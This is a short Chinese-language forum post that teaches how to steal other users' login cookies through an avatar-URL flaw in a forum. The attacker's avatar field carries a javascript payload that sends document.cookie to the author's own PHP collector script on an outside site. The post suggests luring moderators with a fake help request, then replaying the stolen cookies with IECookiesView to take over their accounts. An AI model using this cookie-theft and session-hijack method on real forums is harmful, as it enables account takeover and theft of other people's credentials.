| 各位观众打扰你们一点时间,首先我要说明本文是参考各类资料加上自己的一点点心得写的,请高手多多提出批评 :)
前段时间,由于黑鹰论坛有点小漏洞,也就是头像漏洞,此漏洞危害很多未即使打补丁的论坛,还好经过一段时间的思考,还是弄OK了,好,现在废话少说,进入正题!
首先第一步,先在某论坛申请一个ID号(真TMD的废话)然后将图象的URL地址改为一个自动蹦出又自动隐藏的窗口。而这个窗口中的php脚本的功能就是获取你的Cooie。
先将以下脚本保存在记事本中:
然后保存为heidan.php文件,这脚本的目的就是获取论坛登陆用户的COOKIE的,将本PHP脚本传到自己的网站空间中,地址为http://cntale.51.net/heidan.php
将以上脚本上传OK后在论坛的头像地址中输入如下代码:是不是有点麻烦啊:(
javascript:windows.open('http://cntale.51.net/heidan.php?'+documents.cookie)写好了后提交,现在你就成功一半了,恭喜你!
这时候,你就在论坛上狂发帖子(注:没人看就没办法),只要那倒霉鬼浏览你的帖子他登陆论坛时产生的Cookie就会保存在一个叫heidan.txt的文件。嘿嘿,大家明白了不?好,要是我想得到管理员的Cookie就简单了,就发个叫《求助管理员》这样的帖子我想没几个斑竹不愿意看 :)
Cookie欺骗一直是各网迷的痛病我给大家介绍个工具IeCookiesview,专用来欺骗小羔羊的东东。
再次进入论坛,用我刚才申请的ID在登陆论坛的时候选择将密码保存一天,当然也可选择更久。
进入论坛后,打开正在工作的IeCookiesview,按F5键刷新,看到了什么?一个叫glx.yao2.com的项目,它就是刚才截取的对方论坛人员Cookie。
不好意思,本文暂时先写到这,由于碰到几个老朋友必须去哈酒,下次继续 :)
|
